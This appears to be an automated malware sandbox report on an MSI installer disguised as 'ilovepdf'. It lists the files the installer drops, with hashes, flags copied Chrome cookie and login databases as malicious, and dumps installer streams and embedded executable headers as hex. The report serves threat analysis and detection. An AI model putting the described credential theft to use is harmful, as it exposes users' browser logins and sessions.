                                                                                  Preview: L..................F.... ......:....szn<......e.......'..........................P.O. .:i.....+00.../C:\.....................1.....XS)...PROGRA~2.........L.XS,.....................V.....,...P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....Z.1.....XS,...ilovepdf..B......XS).XS,.....h.........................i.l.o.v.e.p.d.f.....f.2...'..O9. .ilovepdf.exe..J......XS).XS+...............................i.l.o.v.e.p.d.f...e.x.e.......[...............-.......Z...........C........C:\Program Files (x86)\ilovepdf\ilovepdf.exe..2.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.\.i.l.o.v.e.p.d.f...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.........*................@Z|...K.J.........`.......X.......528110...........!a..%.H.VZAj...R..M..........-..!a..%.H.VZAj...R..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1
                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmp
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):35616
                                                                                  Entropy (8bit):6.953519176025623
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):6144
                                                                                  Entropy (8bit):4.720366600008286
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  Process:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3014144
                                                                                  Entropy (8bit):6.393836278460701
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu:dwSi0b67zeCzt0+yO3kS
                                                                                  MD5:D73DDB8F6B777CC6411FD3CA254F3DEC
                                                                                  SHA1:695B2510981FFFCD62B9C0A6C86FED48A2C7F909
                                                                                  SHA-256:36BAFE4EDE8149A84EA4DA3F63B7982E7ACF849266418D8D6D1072FE244D32D6
                                                                                  SHA-512:2769A64798BC5285945F0608EC254B03808AD767A1830167A5DF5E7A963F5929C184694A54030C3B7EF4DFBD776412C85C8CBB1E6567D49D08A1F8B18CF7D418
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...p.._.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...P.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                  C:\Windows\Installer\3cf0a5.msi
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):7306752
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY
                                                                                  MD5:623673851FBB205EB0D1003CB892D4D6
                                                                                  SHA1:C541B4E10541BB0A6565BA8CC6B64D2480EF4437
                                                                                  SHA-256:71A98E982A9DDE0FFCF9A46554B7ABAF947AC4C33F3A3B35DF1A58B0064D0704
                                                                                  SHA-512:AE40BB582937B32C25E0A465CAC75106B04F6E0880CBF0E920F9C0DD80D7DD3E71A9C62BA8607375D7200675D4B4F18571745E00BD920418A662955E4BE23669
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ......................>...................p...............A...................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...........C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q.......S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e.......................................................................................
                                                                                  C:\Windows\Installer\MSIF681.tmp
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):7196926
                                                                                  Entropy (8bit):7.948610318777266
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:yTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY7:ymcTpRGZ3jtn1IShcc8YY7
                                                                                  MD5:24AFC545F42F59E3DB3B3FDA53371BEA
                                                                                  SHA1:B513ED9B64F1A95A631C483F8E08CAB612032764
                                                                                  SHA-256:EACA6FAFF890AA51B563F71E6EA9FAFD4130999234B757AE476B5E87757B7B38
                                                                                  SHA-512:8FABC38AA23E90D3A3CC41D992658C90D6FA4646CA7FA3F76D495C4D8F689C47DFFFF0571F7227032DE3E2191D4985C30E78E04F36BA743206E0C320CA8C5C41
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ...@IXOS.@.....@#fXS.@.....@.....@.....@.....@.....@......&.{D0D5A8D4-2C54-41FD-A0C3-50CC56973D60}..exe2msiSetupPackage..6rfyiAq0nM.msi.@.....@.....@.....@........&.{CDFF8FBF-8895-4382-936D-A20B4780ACE1}.....@.....@.....@.....@.......@.....@.....@.......@......exe2msiSetupPackage......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@......4.m.MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...n.._.................P...........^.......p
                                                                                  C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7196212
                                                                                  Entropy (8bit):7.948679787500133
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:0TKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YYE:0mcTpRGZ3jtn1IShcc8YYE
                                                                                  MD5:B6D7559D31D4FF2D02338DF9CEF2FBD8
                                                                                  SHA1:A46994CDACAD1C1C3C00E09F8DF12C9D6F8BC8AA
                                                                                  SHA-256:33ABF84C329A9C9691A7900059B2106CDD491976F0D5CCCC9CE493F4B7A4670C
                                                                                  SHA-512:6BD3A568588E61E04ED46D4EB67F85BA31ABC6B0FAD382F73A3C738C3A54543DB7E830ABFB1D1AFA8953D603966AE3E8E3AEEF324F58073E5363F7DCE8D844E2
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...n.._.................P...........^.......p....@.......................................@......@...................@....... ..6....p...H...................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....H...p...H..................@..@....................................@..@........................................................
                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):122558
                                                                                  Entropy (8bit):5.363511311327374
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:iHzMV+f84vcIH17Yyxkjr0+NVRVle+yjeLWJOQzi7gZFOIKICh/81r8yQ1oXB4Hi:iHHJCoX5Ci
                                                                                  MD5:4C07CE11405369C87C0F2F0529DD1EDE
                                                                                  SHA1:42AC1D94AE42C4D575C1FC4F2C6A3D52933B004A
                                                                                  SHA-256:1FAAD6F0611922BAD2D21D65BA30CF396EFD76182BF56257AD27100405F8931D
                                                                                  SHA-512:222830B18EECB719372D3295E5A071BD44CB3CDC72780BF79904A4EEC5939B50A7FE42477D08C24A122C5C3F257C5A5113139D3A2A359A4DEE842E282B9A4D4A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  TrID:
                                                                                  • Microsoft Windows Installer (77509/1) 90.59%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 9.36%
                                                                                  • Corel Photo Paint (41/41) 0.05%
                                                                                  File name:6rfyiAq0nM.msi
                                                                                  File size:7306752
                                                                                  MD5:623673851fbb205eb0d1003cb892d4d6
                                                                                  SHA1:c541b4e10541bb0a6565ba8cc6b64d2480ef4437
                                                                                  SHA256:71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
                                                                                  SHA512:ae40bb582937b32c25e0a465cac75106b04f6e0880cbf0e920f9c0dd80d7dd3e71a9c62ba8607375d7200675d4b4f18571745e00bd920418a662955e4be23669
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY
                                                                                  File Content Preview:........................>...................p...............A...................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~..............................................................................

                                                                                  File Icon

                                                                                  Icon Hash:a2a0b496b2caca72

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "6rfyiAq0nM.msi"

                                                                                  Indicators

                                                                                  Has Summary Info:True
                                                                                  Application Name:Windows Installer
                                                                                  Encrypted Document:True
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:False
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:
                                                                                  Flash Objects Count:
                                                                                  Contains VBA Macros:False

                                                                                  Summary

                                                                                  Code Page:1252
                                                                                  Title:exe2msiSetupPackage
                                                                                  Subject:
                                                                                  Author:QwertyLab
                                                                                  Keywords:
                                                                                  Comments:
                                                                                  Template:Intel;1033
                                                                                  Last Saved By:dmitry
                                                                                  Revion Number:{CDFF8FBF-8895-4382-936D-A20B4780ACE1}
                                                                                  Last Printed:2009-09-18 10:48:09.509000
                                                                                  Create Time:2009-09-18 10:48:09.509000
                                                                                  Last Saved Time:2009-09-18 13:10:05.783000
                                                                                  Number of Pages:200
                                                                                  Number of Words:2
                                                                                  Creating Application:Windows Installer
                                                                                  Security:1

                                                                                  Streams

                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:448
                                                                                  Entropy:3.98974006197
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . < . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . P e . . M 8 . . @ . . . P e . . M 8 . . . . . . . . . . W i n d o w s I n s t a l l e r . . . . . . . . . . . e x e 2
                                                                                  Data Raw:fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 0c 00 00 00 9c 00 00 00 12 00 00 00 a8 00 00 00 02 00 00 00 c4 00 00 00 03 00 00 00 e0 00 00 00 04 00 00 00 ec 00 00 00 05 00 00 00 00 01 00 00 06 00 00 00 0c 01 00 00
                                                                                  Stream Path: \x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670, File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Stream Size: 7196212
                                                                                  General
                                                                                  Stream Path:\x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Stream Size:7196212
                                                                                  Entropy:7.9486797875
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:M Z P . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! . . T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 3280
                                                                                  General
                                                                                  Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                                  File Type:data
                                                                                  Stream Size:3280
                                                                                  Entropy:5.27810535323
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . % . % . % . ' . ' . ' . - . - . - . - . - . - . - . - . 1 . 1 . 1 . 2 . 2 . 2 . 3 . 3 . 3 . 4 . 4 . 4 . 4 . 4 . 4 . 4 . = . = . > . > . F . F . F . F . F . F . F . F . F . N . N . N . N . ` . ` . ` . j . j . n . n . p . p . p . p . p . p . p . p . y . y . y . y . y . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 1f 00 1f 00 1f 00 25 00 25 00 25 00 27 00 27 00 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 31 00 31 00 31 00 32 00 32 00 32 00 33 00 33 00 33 00 34 00 34 00 34 00 34 00 34 00 34 00 34 00 3d 00 3d 00 3e 00 3e 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4e 00 4e 00 4e 00 4e 00 60 00 60 00 60 00 6a 00
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 29802
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                  Stream Size:29802
                                                                                  Entropy:4.69223735488
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:N a m e T a b l e T y p e _ V a l i d a t i o n C o l u m n N u l l a b l e M i n V a l u e M a x V a l u e K e y T a b l e K e y C o l u m n C a t e g o r y S e t D e s c r i p t i o n N I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y T e x t D e s c r i p t i o n o f c o l u m n S e t o f v a l u e s t h a t a r e p e r m i t t e d T e x t ; F o r m a t t e d ; T e m p l a t e ; C o n d i t i o n ; G u i d ; P a t h ; V e r s i o n ; L a n g u a g e ; I d e n t i
                                                                                  Data Raw:4e 61 6d 65 54 61 62 6c 65 54 79 70 65 5f 56 61 6c 69 64 61 74 69 6f 6e 43 6f 6c 75 6d 6e 4e 75 6c 6c 61 62 6c 65 4d 69 6e 56 61 6c 75 65 4d 61 78 56 61 6c 75 65 4b 65 79 54 61 62 6c 65 4b 65 79 43 6f 6c 75 6d 6e 43 61 74 65 67 6f 72 79 53 65 74 44 65 73 63 72 69 70 74 69 6f 6e 4e 49 64 65 6e 74 69 66 69 65 72 4e 61 6d 65 20 6f 66 20 74 61 62 6c 65 4e 61 6d 65 20 6f 66 20 63 6f 6c
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 3008
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                                  File Type:data
                                                                                  Stream Size:3008
                                                                                  Entropy:3.52620475136
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . $ . . . 6 . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . . . . . . . . . j . . . . . . . B . . . . . ( . . . . . . . . . o . . . M . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . ( . . .
                                                                                  Data Raw:e4 04 00 00 04 00 14 00 05 00 06 00 00 00 00 00 04 00 0c 00 0b 00 15 00 06 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 03 00 02 00 0b 00 18 00 01 00 02 01 0a 00 99 00 0d 00 01 00 0e 00 01 00 01 00 ac 00 04 00 47 00 15 00 01 00 20 00 01 00 ca 00 01 00 0f 00 01 00 24 00 01 00 36 00 01 00 15 00 01 00 15 00 01 00 05 00 01 00 1e 00 01 00 0a 00 07 00
                                                                                  Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 172
                                                                                  General
                                                                                  Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                                  File Type:data
                                                                                  Stream Size:172
                                                                                  Entropy:4.83586062657
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . % . ' . - . 1 . 2 . 3 . 4 . = . > . F . N . ` . j . n . p . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . & . ) . 0 . 4 . A . H . I . J . O . R . U . Y . d . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . : . J . [ . e . m . p . } .
                                                                                  Data Raw:05 00 1f 00 25 00 27 00 2d 00 31 00 32 00 33 00 34 00 3d 00 3e 00 46 00 4e 00 60 00 6a 00 6e 00 70 00 79 00 84 00 85 00 88 00 9b 00 a0 00 b4 00 ba 00 bd 00 c6 00 cc 00 df 00 e6 00 ed 00 f0 00 f8 00 00 01 09 01 0e 01 12 01 17 01 1a 01 23 01 26 01 29 01 30 01 34 01 41 01 48 01 49 01 4a 01 4f 01 52 01 55 01 59 01 64 01 72 01 8e 01 99 01 9f 01 a2 01 a7 01 af 01 b6 01 bb 01 bf 01 c8 01
                                                                                  Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 10176
                                                                                  General
                                                                                  Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                                  File Type:data
                                                                                  Stream Size:10176
                                                                                  Entropy:2.8257387661
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . % . % . % . ' . ' . ' . - . - . - . - . - . - . - . - . 1 . 1 . 1 . 2 . 2 . 2 . 3 . 3 . 3 . 4 . 4 . 4 . 4 . 4 . 4 . 4 . = . = . > . > . F . F . F . F . F . F . F . F . F . N . N . N . N . ` . ` . ` . j . j . n . n . p . p . p . p . p . p . p . p . y . y . y . y . y . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 1f 00 1f 00 1f 00 25 00 25 00 25 00 27 00 27 00 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 31 00 31 00 31 00 32 00 32 00 32 00 33 00 33 00 33 00 34 00 34 00 34 00 34 00 34 00 34 00 34 00 3d 00 3d 00 3e 00 3e 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4e 00 4e 00 4e 00 4e 00 60 00 60 00 60 00 6a 00
                                                                                  Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54
                                                                                  General
                                                                                  Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                  File Type:data
                                                                                  Stream Size:54
                                                                                  Entropy:3.64425475307
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . < .
                                                                                  Data Raw:83 02 85 02 86 02 87 02 88 02 89 02 8a 02 8b 02 8c 02 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee 82 20 83 84 83 e8 83 78 85 dc 85 a0 8f c8 99 3c 8f
                                                                                  Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 84
                                                                                  General
